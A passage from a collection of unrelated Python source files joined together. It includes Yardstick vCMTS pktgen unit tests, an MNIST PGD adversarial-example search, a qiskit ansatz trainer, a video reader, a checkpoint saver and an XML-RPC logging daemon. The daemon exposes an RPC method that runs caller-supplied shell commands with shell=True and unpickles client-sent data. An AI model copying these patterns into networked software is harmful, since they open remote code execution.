port_cfg = self.setup_helper.find_port_cfg(\
TestVcmtsPktgen.PKTGEN_POD_VALUES[0]['ports'], "port_0")
self.assertIsNotNone(port_cfg)
port_cfg = self.setup_helper.find_port_cfg(\
TestVcmtsPktgen.PKTGEN_POD_VALUES[0]['ports'], "port_8")
self.assertIsNone(port_cfg)
def test_build_pktgen_parameters(self):
parameters = self.setup_helper.build_pktgen_parameters(
TestVcmtsPktgen.PKTGEN_POD_VALUES[0])
self.assertEquals(parameters, self.PKTGEN_PARAMETERS)
def test_start_pktgen(self):
self.setup_helper.ssh_helper = mock.MagicMock()
self.setup_helper.start_pktgen(TestVcmtsPktgen.PKTGEN_POD_VALUES[0])
self.setup_helper.ssh_helper.send_command.assert_called_with(
self.PKTGEN_PARAMETERS)
def test_setup_vnf_environment(self):
self.assertIsNone(self.setup_helper.setup_vnf_environment())
class TestVcmtsPktgen(unittest.TestCase):
VNFD = {'vnfd:vnfd-catalog':
{'vnfd':
[{
"benchmark": {
"kpi": [
"upstream/bits_per_second"
]
},
"connection-point": [
{
"name": "xe0",
"type": "VPORT"
},
{
"name": "xe1",
"type": "VPORT"
}
],
"description": "vCMTS Pktgen Kubernetes",
"id": "VcmtsPktgen",
"mgmt-interface": {
"ip": "192.168.24.150",
"key_filename": "/tmp/yardstick_key-a3b663c2",
"user": "root",
"vdu-id": "vcmtspktgen-kubernetes"
},
"name": "vcmtspktgen",
"short-name": "vcmtspktgen",
"vdu": [
{
"description": "vCMTS Pktgen Kubernetes",
"external-interface": [],
"id": "vcmtspktgen-kubernetes",
"name": "vcmtspktgen-kubernetes"
}
],
"vm-flavor": {
"memory-mb": "4096",
"vcpu-count": "4"
}
}]
}}
PKTGEN_POD_VALUES = [
{
"num_ports": "4",
"pktgen_id": "0",
"ports": [
{
"net_pktgen": "18:02.0",
"num_ofdm": "1",
"num_subs": "100",
"port_0": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "18:02.1",
"num_ofdm": "1",
"num_subs": "100",
"port_1": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "18:02.2",
"num_ofdm": "1",
"num_subs": "100",
"port_2": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "18:02.3",
"num_ofdm": "1",
"num_subs": "100",
"port_3": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_4": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_5": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_6": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_7": "",
"traffic_type": "imix1"
}
]
},
{
"num_ports": 4,
"pktgen_id": 1,
"ports": [
{
"net_pktgen": "18:0a.0",
"num_ofdm": "1",
"num_subs": "100",
"port_0": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "18:0a.1",
"num_ofdm": "1",
"num_subs": "100",
"port_1": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "18:0a.2",
"num_ofdm": "1",
"num_subs": "100",
"port_2": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "18:0a.3",
"num_ofdm": "1",
"num_subs": "100",
"port_3": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_4": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_5": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_6": "",
"traffic_type": "imix1"
},
{
"net_pktgen": "00:00.0",
"num_ofdm": "1",
"num_subs": "100",
"port_7": "",
"traffic_type": "imix1"
}
]
}
]
SCENARIO_CFG = {
"nodes": {
"tg__0": "pktgen0-k8syardstick-a3b663c2",
"vnf__0": "vnf0us-k8syardstick-a3b663c2",
"vnf__1": "vnf0ds-k8syardstick-a3b663c2"
},
"options": {
"pktgen_values": "/tmp/pktgen_values.yaml",
"tg__0": {
"pktgen_id": 0
},
"vcmts_influxdb_ip": "10.80.5.150",
"vcmts_influxdb_port": 8086,
"vcmtsd_values": "/tmp/vcmtsd_values.yaml",
"vnf__0": {
"sg_id": 0,
"stream_dir": "us"
},
"vnf__1": {
"sg_id": 0,
"stream_dir": "ds"
}
},
"task_id": "a3b663c2-e616-4777-b6d0-ec2ea7a06f42",
"task_path": "samples/vnf_samples/nsut/cmts",
"tc": "tc_vcmts_k8s_pktgen",
"topology": "k8s_vcmts_topology.yaml",
"traffic_profile": "../../traffic_profiles/fixed.yaml",
"type": "NSPerf"
}
CONTEXT_CFG = {
"networks": {
"flannel": {
"name": "flannel"
},
"xe0": {
"name": "xe0"
},
"xe1": {
"name": "xe1"
}
},
"nodes": {
"tg__0": {
"VNF model": "../../vnf_descriptors/tg_vcmts_tpl.yaml",
"interfaces": {
"flannel": {
"local_ip": "192.168.24.150",
"local_mac": None,
"network_name": "flannel"
},
"xe0": {
"local_ip": "192.168.24.150",
"local_mac": None,
"network_name": "xe0"
},
"xe1": {
"local_ip": "192.168.24.150",
"local_mac": None,
"network_name": "xe1"
}
},
"ip": "192.168.24.150",
"key_filename": "/tmp/yardstick_key-a3b663c2",
"member-vnf-index": "1",
"name": "pktgen0-k8syardstick-a3b663c2",
"private_ip": "192.168.24.150",
"service_ports": [
{
"name": "ssh",
"node_port": 60270,
"port": 22,
"protocol": "TCP",
"target_port": 22
},
{
"name": "lua",
"node_port": 43619,
"port": 22022,
"protocol": "TCP",
"target_port": 22022
}
],
"ssh_port": 60270,
"user": "root",
"vnfd-id-ref": "tg__0"
},
"vnf__0": {
"VNF model": "../../vnf_descriptors/vnf_vcmts_tpl.yaml",
"interfaces": {
"flannel": {
"local_ip": "192.168.100.132",
"local_mac": None,
"network_name": "flannel"
},
"xe0": {
"local_ip": "192.168.100.132",
"local_mac": None,
"network_name": "xe0"
},
"xe1": {
"local_ip": "192.168.100.132",
"local_mac": None,
"network_name": "xe1"
}
},
"ip": "192.168.100.132",
"key_filename": "/tmp/yardstick_key-a3b663c2",
"member-vnf-index": "3",
"name": "vnf0us-k8syardstick-a3b663c2",
"private_ip": "192.168.100.132",
"service_ports": [
{
"name": "ssh",
"node_port": 57057,
"port": 22,
"protocol": "TCP",
"target_port": 22
},
{
"name": "lua",
"node_port": 29700,
"port": 22022,
"protocol": "TCP",
"target_port": 22022
}
],
"ssh_port": 57057,
"user": "root",
"vnfd-id-ref": "vnf__0"
},
"vnf__1": {
"VNF model": "../../vnf_descriptors/vnf_vcmts_tpl.yaml",
"interfaces": {
"flannel": {
"local_ip": "192.168.100.134",
"local_mac": None,
"network_name": "flannel"
},
"xe0": {
"local_ip": "192.168.100.134",
"local_mac": None,
"network_name": "xe0"
},
"xe1": {
"local_ip": "192.168.100.134",
"local_mac": None,
"network_name": "xe1"
}
},
"ip": "192.168.100.134",
"key_filename": "/tmp/yardstick_key-a3b663c2",
"member-vnf-index": "4",
"name": "vnf0ds-k8syardstick-a3b663c2",
"private_ip": "192.168.100.134",
"service_ports": [
{
"name": "ssh",
"node_port": 18581,
"port": 22,
"protocol": "TCP",
"target_port": 22
},
{
"name": "lua",
"node_port": 18469,
"port": 22022,
"protocol": "TCP",
"target_port": 22022
}
],
"ssh_port": 18581,
"user": "root",
"vnfd-id-ref": "vnf__1"
}
}
}
PKTGEN_VALUES_PATH = "/tmp/pktgen_values.yaml"
PKTGEN_VALUES = \
"serviceAccount: cmk-serviceaccount\n" \
"images:\n" \
" vcmts_pktgen: vcmts-pktgen:v18.10\n" \
"topology:\n" \
" pktgen_replicas: 8\n" \
" pktgen_pods:\n" \
" - pktgen_id: 0\n" \
" num_ports: 4\n" \
" ports:\n" \
" - port_0:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.0\n" \
" - port_1:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.1\n" \
" - port_2:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.2\n" \
" - port_3:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.3\n" \
" - port_4:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.4\n" \
" - port_5:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.5\n" \
" - port_6:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.6\n" \
" - port_7:\n" \
" traffic_type: 'imix2'\n" \
" num_ofdm: 4\n" \
" num_subs: 300\n" \
" net_pktgen: 8a:02.7\n"
def setUp(self):
vnfd = self.VNFD['vnfd:vnfd-catalog']['vnfd'][0]
self.vcmts_pktgen = tg_vcmts_pktgen.VcmtsPktgen(NAME, vnfd)
self.vcmts_pktgen._start_server = mock.Mock(return_value=0)
self.vcmts_pktgen.resource_helper = mock.MagicMock()
self.vcmts_pktgen.setup_helper = mock.MagicMock()
def test___init__(self):
self.assertFalse(self.vcmts_pktgen.traffic_finished)
self.assertIsNotNone(self.vcmts_pktgen.setup_helper)
self.assertIsNotNone(self.vcmts_pktgen.resource_helper)
def test_extract_pod_cfg(self):
pod_cfg = self.vcmts_pktgen.extract_pod_cfg(self.PKTGEN_POD_VALUES, "0")
self.assertIsNotNone(pod_cfg)
self.assertEqual(pod_cfg["pktgen_id"], "0")
pod_cfg = self.vcmts_pktgen.extract_pod_cfg(self.PKTGEN_POD_VALUES, "4")
self.assertIsNone(pod_cfg)
@mock.patch.object(ctx_base.Context, 'get_context_from_server',
return_value='fake_context')
def test_instantiate_missing_pktgen_values_key(self, *args):
err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
err_scenario_cfg['options'].pop('pktgen_values', None)
with self.assertRaises(KeyError):
self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)
@mock.patch.object(ctx_base.Context, 'get_context_from_server',
return_value='fake_context')
def test_instantiate_missing_pktgen_values_file(self, *args):
if os.path.isfile(self.PKTGEN_VALUES_PATH):
os.remove(self.PKTGEN_VALUES_PATH)
err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
err_scenario_cfg['options']['pktgen_values'] = self.PKTGEN_VALUES_PATH
with self.assertRaises(RuntimeError):
self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)
@mock.patch.object(ctx_base.Context, 'get_context_from_server',
return_value='fake_context')
def test_instantiate_empty_pktgen_values_file(self, *args):
yaml_sample = open(self.PKTGEN_VALUES_PATH, 'w')
yaml_sample.write("")
yaml_sample.close()
err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
err_scenario_cfg['options']['pktgen_values'] = self.PKTGEN_VALUES_PATH
with self.assertRaises(RuntimeError):
self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)
if os.path.isfile(self.PKTGEN_VALUES_PATH):
os.remove(self.PKTGEN_VALUES_PATH)
@mock.patch.object(ctx_base.Context, 'get_context_from_server',
return_value='fake_context')
def test_instantiate_invalid_pktgen_id(self, *args):
yaml_sample = open(self.PKTGEN_VALUES_PATH, 'w')
yaml_sample.write(self.PKTGEN_VALUES)
yaml_sample.close()
err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
err_scenario_cfg['options'][NAME]['pktgen_id'] = 12
with self.assertRaises(KeyError):
self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)
if os.path.isfile(self.PKTGEN_VALUES_PATH):
os.remove(self.PKTGEN_VALUES_PATH)
@mock.patch.object(ctx_base.Context, 'get_context_from_server',
return_value='fake_context')
def test_instantiate_all_valid(self, *args):
yaml_sample = open(self.PKTGEN_VALUES_PATH, 'w')
yaml_sample.write(self.PKTGEN_VALUES)
yaml_sample.close()
self.vcmts_pktgen.instantiate(self.SCENARIO_CFG, self.CONTEXT_CFG)
self.assertIsNotNone(self.vcmts_pktgen.pod_cfg)
self.assertEqual(self.vcmts_pktgen.pod_cfg["pktgen_id"], "0")
if os.path.isfile(self.PKTGEN_VALUES_PATH):
os.remove(self.PKTGEN_VALUES_PATH)
def test_run_traffic_failed_connect(self):
self.vcmts_pktgen.pktgen_helper = mock.MagicMock()
self.vcmts_pktgen.pktgen_helper.connect.return_value = False
with self.assertRaises(exceptions.PktgenActionError):
self.vcmts_pktgen.run_traffic({})
def test_run_traffic_successful_connect(self):
self.vcmts_pktgen.pktgen_helper = mock.MagicMock()
self.vcmts_pktgen.pktgen_helper.connect.return_value = True
self.vcmts_pktgen.pktgen_rate = 8.0
self.assertTrue(self.vcmts_pktgen.run_traffic({}))
self.vcmts_pktgen.pktgen_helper.connect.assert_called_once()
self.vcmts_pktgen.pktgen_helper.send_command.assert_called_with(
'pktgen.start("all");')
|
pgd.py | import os
import time
import csv
import numpy as np
import argparse
from multiprocessing import Process, Pipe, cpu_count
parser = argparse.ArgumentParser(description='')
parser.add_argument('--model', type=str, required=True, help='Path to model')
parser.add_argument('--epsilon', type=float, required=True, help='Epsilon')
parser.add_argument('--pgd_epsilon', type=float, required=True, help='Epsilon')
parser.add_argument('--im', type=int, required=True, help='Image number')
parser.add_argument('--it', type=int, default=500, help='Iterations')
parser.add_argument('--threads', type=int, default=None, help='Number of threads')
args = parser.parse_args()
csvfile = open('mnist_test_comp.csv', 'r')
tests = csv.reader(csvfile, delimiter=',')
tests = list( tests )
test = tests[ args.im ]
image= np.float64(test[1:len(test)])
corr_label = int( test[ 0 ] )
specLB = np.copy(image)
specUB = np.copy(image)
specLB -= args.epsilon
specUB += args.epsilon
specLB = np.maximum( 0, specLB )
specUB = np.minimum( 255, specUB )
pgd_args = ( args.pgd_epsilon*np.ones_like(specLB), args.pgd_epsilon*np.ones_like(specLB), 5, 100)
if args.threads is None:
args.threads = cpu_count()
def create_pool( corr_label, args ):
conns = []
procs = []
parent_pid = os.getpid()
proc_id = 0
for cpu in range( 10 ):
if corr_label == cpu:
continue
parent_conn, child_conn = Pipe()
conns.append( parent_conn )
p = Process(target=thread, args=( proc_id % args.threads, cpu, args, child_conn ))
p.start()
procs.append( p )
proc_id += 1
return conns, procs
def thread( proc_id, i, args, conn ):
import tensorflow as tf
from pgd_div import create_pgd_graph, pgd
from tensorflow.contrib import graph_editor as ge
print( 'Proc', proc_id )
os.sched_setaffinity(0,[proc_id])
model_path = args.model
sess = tf.Session()
with tf.gfile.FastGFile(model_path, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
g = tf.import_graph_def(graph_def, name='')
tf_out = sess.graph.get_operations()[-1].inputs[0]
tf_in_new = tf.placeholder( shape=(784), dtype=tf.float64, name='x' )
tf_in_old = tf.reshape( tf_in_new, (1,1,1,784) )
tf_in_old = tf.cast( tf_in_old, tf.float32 )
tf_in = tf.get_default_graph().get_tensor_by_name( 'input:0' )
tf_output = ge.graph_replace(tf_out, {tf_in: tf_in_old})
tf_output = tf.cast( tf_output, tf.float64 )
pgd_obj = create_pgd_graph( specLB, specUB, sess, tf_in_new, tf_output, i )
for j in range( args.it ):
ex = pgd(sess, specLB, specUB, *pgd_obj, *pgd_args)
status = conn.poll(0.001)
if status:
if conn.recv() == 'kill':
return
if np.argmax( sess.run( tf_output, feed_dict={tf_in_new: ex} )) == i:
conn.send( (i,ex) )
while True:
status = conn.poll(1)
if status:
if conn.recv() == 'kill':
return
conn.send( (i,False) )
while True:
status = conn.poll(1)
if status:
if conn.recv() == 'kill':
return
start = time.time()
print("img", args.im)
conns, procs = create_pool( corr_label, args )
mapping = []
for conn in range( len( conns ) ):
mapping.append( True )
while True:
if not np.any( mapping ):
break
for i in range( len( conns ) ):
conn = conns[i]
if mapping[ i ]:
status = conn.poll(0.1)
if status:
res = conn.recv()
mapping[ i ] = False
conn.send( 'kill' )
if not ( res[1] is False ):
print( 'Attack found for', res[0], ':' )
print( res[1] )
for i in range( len( conns ) ):
if mapping[ i ]:
conn = conns[i]
conn.send( 'kill' )
for proc in procs:
proc.join()
end = time.time()
print(end - start, "seconds")
exit()
#else:
#print( 'No attacks for', res[0] )
print( 'No attacks' )
end = time.time()
print(end - start, "seconds")
|
linear_anstaz_w_multithread.py | import qiskit
import numpy as np
import sys
import qtm.base
import qtm.constant
import qtm.ansatz
import qtm.fubini_study
import qtm.encoding
import multiprocessing
def runw(num_layers, num_qubits):
thetas = np.ones((num_qubits*num_layers*5))
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
loss_values = []
thetass = []
for i in range(0, 100):
if i % 20 == 0:
print('Linear ansatz W: (' + str(num_layers) +
',' + str(num_qubits) + '): ' + str(i))
G = qtm.fubini_study.qng(
qc.copy(), thetas, qtm.ansatz.create_GHZchecker_linear, num_layers)
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Wchecker_linear,
thetas, r=1/2, s=np.pi/2, num_layers=num_layers)
thetas = np.real(thetas - qtm.constant.learning_rate *
(np.linalg.inv(G) @ grad_loss))
qc_copy = qtm.ansatz.create_Wchecker_linear(
qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_fubini_study(qtm.base.measure(
qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
thetass.append(thetas)
np.savetxt("../experiments/linear_ansatz_w/" + str(num_qubits) +
"/loss_values_qng.csv", loss_values, delimiter=",")
np.savetxt("../experiments/linear_ansatz_w/" +
str(num_qubits) + "/thetass_qng.csv", thetass, delimiter=",")
traces = []
fidelities = []
i = 0
for thetas in thetass:
# Get |psi> = U_gen|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_linear_state(qc, thetas, num_layers)
psi , rho_psi = qtm.base.extract_state(qc)
# Get |psi~> = U_target|000...>
qc1 = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc1 = qtm.ansatz.create_w_state(num_qubits)
psi_hat , rho_psi_hat = qtm.base.extract_state(qc1)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
np.savetxt("../experiments/linear_ansatz_W/" +
str(num_qubits) + "/traces_qng.csv", traces, delimiter=",")
np.savetxt("../experiments/linear_ansatz_W/" + str(num_qubits) +
"/fidelities_qng.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_qubits = [2, 3, 4, 5, 6, 7, 8, 9, 10]
linear_ansatzs = []
i = 2
for j in num_qubits:
linear_ansatzs.append(multiprocessing.Process(
target=runw, args=(i, j)))
for linear_ansatz in linear_ansatzs:
linear_ansatz.start()
for linear_ansatz in linear_ansatzs:
linear_ansatz.join()
print("Done!")
|
videoreader.py | from threading import Thread
import sys
import time
import numpy as np
import ffmpeg
width = 1280
height = 720
class VideoReader:
def __init__(self, path, fps):
self.stopped = False
self.frame = None
self.path = path
self.fps = fps
self.process = None
self.frames = 0
self.firstFrame = False
def start(self):
# Start ffmpeg output and read it from stdout
self.process = (
ffmpeg
.input(self.path)
.output('pipe:', format='rawvideo', pix_fmt='rgb24')
.run_async(pipe_stdout=True)
)
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# Get the latest frame from ffmpeg and save it
currentTime = 0
lastFrameTime = 0
while True:
in_bytes = self.process.stdout.read(width * height * 3)
if not in_bytes:
self.stop()
return
self.firstFrame = True
frame = (
np
.frombuffer(in_bytes, np.uint8)
.reshape([height, width, 3])
)
self.frame = frame
self.frames += 1
frameTime = time.time() - lastFrameTime
if lastFrameTime != 0 and frameTime < 1/self.fps:
time.sleep(max(1/self.fps - frameTime, 0))
lastFrameTime = time.time()
def read(self):
return self.frame
def more(self):
return self.stopped == False and self.firstFrame
def stop(self):
print('STOP'*10)
self.stopped = True
self.process.stdout.close()
self.process.wait()
|
async_save.py | import torch
from torch.multiprocessing import Process
import numpy as np
import logging
from collections import OrderedDict
from typing import Any, Dict
logger = logging.getLogger(__name__)
def copy_cpu_state_dict(states: Any) -> Dict[str, Any]:
# need a new dict
result_states = OrderedDict()
if isinstance(states, dict):
# recursion
for k in states:
result_states[k] = copy_cpu_state_dict(states[k])
elif isinstance(states, list):
result_states = [copy_cpu_state_dict(item) for item in states]
elif isinstance(states, torch.Tensor):
# If it is torch.Tensor, copy to cpu first
result_states = states.cpu()
elif isinstance(states, (int, float, str, tuple, type(None))):
result_states = states
else:
result_states = states
logging.warn(f"`copy_cpu_state_dict` cannot parse {type(states)}")
# print(f"`copy_cpu_state_dict` cannot parse {type(states)}")
return result_states
def _save(states: OrderedDict, filename):
torch.save(states, filename)
return 0
def async_save(model_states: OrderedDict, filename) -> Process:
model_states = copy_cpu_state_dict(model_states)
p = Process(target=_save, args=(model_states, filename), daemon=True)
p.daemon = True
p.start()
return p
def async_wait(process: Process):
process.join() |
damarisd.py | import tables as T
import numpy as N
import subprocess
import threading
import SimpleXMLRPCServer
import SocketServer
import time,xmlrpclib,httplib
import cPickle as pickle
import ConfigParser
import sys, os
import imp
# xmlrpc mit timeout
def Server(url, *args, **kwargs):
t = TimeoutTransport()
t.timeout = kwargs.get('timeout', 60)
if 'timeout' in kwargs:
del kwargs['timeout']
kwargs['transport'] = t
server = xmlrpclib.Server(url, *args, **kwargs)
return server
class TimeoutTransport(xmlrpclib.Transport):
def make_connection(self, host):
conn = TimeoutHTTP(host)
conn.set_timeout(self.timeout)
return conn
class TimeoutHTTPConnection(httplib.HTTPConnection):
def connect(self):
httplib.HTTPConnection.connect(self)
self.sock.settimeout(self.timeout)
class TimeoutHTTP(httplib.HTTP):
_connection_class = TimeoutHTTPConnection
def set_timeout(self, timeout):
self._conn.timeout = timeout
# Create server
# SocketServer.ThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer
#class ThreadingXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer): pass
class ThreadingXMLRPCServer(SocketServer.ThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer): pass
#class ThreadingXMLRPCServer(SocketServer.ThreadingTCPServer, SimpleXMLRPCServer.SimpleXMLRPCServer): pass
#class ThreadingXMLRPCServer(SocketServer.TCPServer, SimpleXMLRPCServer.SimpleXMLRPCDispatcher):
# def __init__(self, addr, requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler, logRequests = 0):
# self.logRequests = logRequests
# if sys.version_info[:2] < (2, 5):
# SimpleXMLRPCServer.SimpleXMLRPCDispatcher.__init__(self)
# else:
# SimpleXMLRPCServer.SimpleXMLRPCDispatcher.__init__(self, allow_none = False, encoding = None)
# SocketServer.ThreadingTCPServer.__init__(self, addr, requestHandler)
# pass
# The Damaris Logger Daemon
class DamarisLogger:
def __init__(self, data_file, max_puts_before_flush,port):
#print os.getcwd()
self.hdf = T.openFile(data_file,'a')
self.run_flag = True
self.server = ThreadingXMLRPCServer(("localhost", port), logRequests=0)
self.server.allow_reuse_address = True
self.server.allow_none = True
self.server.allow_introspection = True
self.server.register_introspection_functions=True
self.server.register_function(self.put_data)
self.server.register_function(self.get_data)
self.server.register_function(self.put_external_data)
self.server.register_function(self.unblock_client)
self.server.register_function(self.block_client)
self.server.register_function(self.occupied)
self.server.register_function(self.quit)
self.server.register_function(self.quit_client)
self.server.register_function(self.status)
self.server.register_function(self.register_client)
self.server.register_function(self.unregister_client)
self.server.register_function(self.quit_device)
self.server.register_function(self.server_run)
self.puts = 0
self.total_puts = 0
self.block_list = set()
self.quit_list = set()
self.quit_client_flag = False
self.client_list = set()
self.max_puts_before_flush = max_puts_before_flush
self.lock = threading.Lock()
def __del__(self):
try:
print "closing files ..."
self.hdf.flush()
self.hdf.close()
except:
print "Could not close files, sorry!"
def register_client(self,device):
self.client_list.add(device)
return None
def unregister_client(self,device):
self.client_list.remove(device)
return None
def flushing(self):
self.lock.acquire()
if self.puts >= self.max_puts_before_flush:
self.hdf.flush()
self.puts = 0
self.lock.release()
return None
def server_run(self):
return self.run_flag
def quit(self):
#self.run_flag = False
self.quit_client_flag = True
i = 0
while (i < 10) and not len(self.client_list) == 0:
i += 1
print "Clients still running ...", self.client_list
time.sleep(0.5)
self.__del__()
self.run_flag = False
return None
def status(self):
self.flushing()
return self.total_puts, list(self.client_list), list(self.block_list)
def quit_device(self,device):
"""
Tell client 'device' to quit
"""
self.quit_list.add(device)
return None
######## client controls ###############
def quit_client(self, device):
"""
Should the client 'device' quit?
"""
if device in self.quit_list:
self.quit_list.remove(device)
return True
if self.quit_client_flag:
return self.quit_client_flag
def occupied(self,device):
if device in self.block_list:
return True
else:
return False
def block_client(self,device):
self.block_list.add(device)
return None
def unblock_client(self,device):
self.block_list.remove(device)
return None
########################################
def run(self):
"""
This function is starting the server and registering the needed functions
"""
print "Server up and running ..."
while self.run_flag:
self.server.handle_request()
def put_external_data(self, device, command):
"""
Reads data from an external (shell) command
"""
record_time = time.time()
external = subprocess.Popen(command, shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
in_data = external.stdout.readline()
# result = map(float, in_data.strip().split(' '))
# Much faster!
result = N.fromstring("".join(in_data), sep=' ')
self.put_data(device, record_time, result)
return 1
def put_data(self, device, record_time, data):
"""
Put in data via an external program. The program should connect to the
DAMARISd daemon and issue this command.
record_time is a list of timestamps, from for example time.time().
value is a cPickle.dumps(numpy.array), each row corresponds to a
time stamp
"""
def make_EArray(device,cols):
try:
self.hdf.root._g_checkHasChild(device) # throws NoSuchNodeError if not existing
device_array = self.hdf.getNode('/',device)
except T.exceptions.NoSuchNodeError:
device_array = self.hdf.createEArray('/',device,
atom=T.Float64Atom(),
shape=(0,cols+1))
return device_array
# Check the type of record_time, we need one dimensional data
if type(record_time) != list:
# if a numpy array
if type(record_time) == N.ndarray:
if all(record_time.shape) > 1:
# we need one dimensional time data, thus flatten
record_time = record_time.flatten()
# not a numpy array, make a list out of it
#else:
# record_time = list(record_time)
# Data comes from outside client via xmlrpclib
if type(data) == str:
data = pickle.loads(data)
# rows, cols for creating the pytables array
rows_cols = data.shape
# is one dimension
if len(rows_cols) == 1:
rows = 1
cols = rows_cols[0]
# is two dimensinal
if len(rows_cols) == 2:
rows,cols = rows_cols
else:
# todo error handling
pass
device_array = make_EArray(device,cols)
rows = N.empty((rows,cols+1))
rows[:,0]=record_time
rows[:,1:]=data
try:
device_array.append(rows)
except:
print "ERROR! Quitting client: %s"%device
self.quit_device(device)
# update puts, flush if necessary
self.lock.acquire()
self.total_puts += 1
self.puts += 1
self.lock.release()
self.flushing()
return None
def search(self,anarray,value,start=None,stop=None):
"""
Binary search, needs ~ 23 iterations for 12e6 records
"""
Found = False
if start == None:
start = 0
if stop == None:
stop = anarray.shape[0]
bisect = (stop+start)/2
current_point = anarray.read(start=bisect)[:,0]
while not Found:
if value < current_point:
stop = bisect-1
elif value > current_point:
start = bisect+1
# can't go higher
if start >= anarray.shape[0]:
start=bisect
bisect = (stop+start)/2
if bisect >= anarray.shape[0]:
bisect = anarray.shape[0]
if bisect < 0:
bisect = 0
current_point = anarray.read(start=bisect)[:,0]
if start >= stop:
Found = True
return bisect
def get_data(self, device, start_time, stop_time):
self.hdf.flush()
device_array = self.hdf.getNode('/',device)
# select the values in timeframe
# This is very inefficient
#tmp = [ x[:] for x in device_array.iterrows()
# if (start_time <= x[0] <= stop_time) ]
#values_to_return = N.empty((len(tmp), len(tmp[0])))
#for i,row in enumerate(tmp):
# values_to_return[i,:]=row
# using binary search
start_point = self.search(device_array,start_time)
# don't search the whole thing again, start at start_point
end_point = self.search(device_array,stop_time, start = start_point-1)
#print start_point, end_point,device
if start_point == end_point:
values_to_return = device_array.read(start_point)
else:
values_to_return = device_array.read(start_point, end_point)
return_object = pickle.dumps(values_to_return, protocol=0)
return return_object
def damarisd_daemon():
s = "%s Starting server"%(time.ctime())
print
print len(s)*"#"
print s
print len(s)*"#"
############ GENERAL CONFIGURATION PART ###################
config = ConfigParser.ConfigParser()
config.read('damarisd.config')
devices = [sec for sec in config.sections()]# if sec!="general"]
data_file = config.defaults()['data_file']
max_puts_before_flush = int(config.defaults()['max_puts_before_flush'])
port = int(config.defaults()['port'])
# log the config
for sec in config.sections():
print "Device: %s"%sec
for pair in sorted(config.items(sec)):
keys,val = pair
print "\t%s = %s"%pair
############## SERVER PART ######################
damarisd_server = DamarisLogger(data_file,max_puts_before_flush,port)
daemon = threading.Thread(target = damarisd_server.run)
daemon.setDaemon(True)
daemon.start()
# move this to background daemon.run()
time.sleep(0.1)
server = Server('http://localhost:%i'%port)
######### CLIENT PART ############
def shelldevice_thread(device, command,rate):
Quit = False
#server = xmlrpclib.Server('http://localhost:%i'%port)
server.register_client(device)
while not Quit:
Quit = bool(server.quit_client(device))
if server.occupied(device) == 0:
server.put_external_data(device, command)
time.sleep(rate)
server.unregister_client(device)
def pydevice_thread(device, module, arg_list):
"""
Python module interface.
All the logic has to be in the client module.
On start:
a) server.register_client(device)
b) server.put_data
c) check server.occupied
d) check server.quit_client flag
On quitting:
a) last transmission
b) server.unregister_client(device)
"""
fm = imp.find_module(module)
mod = imp.load_module(module, fm[0],fm[1],fm[2])
mod.doit(server, device, arg_list)
# start the device logger
# distinguish between shell commands and python scripts
################### CLIENT CONFIGURATION ###########################
shelldevices = [dev for dev in devices if config.has_option(dev,'command')]
pydevices = [dev for dev in devices if config.has_option(dev,'module')]
for device in shelldevices:
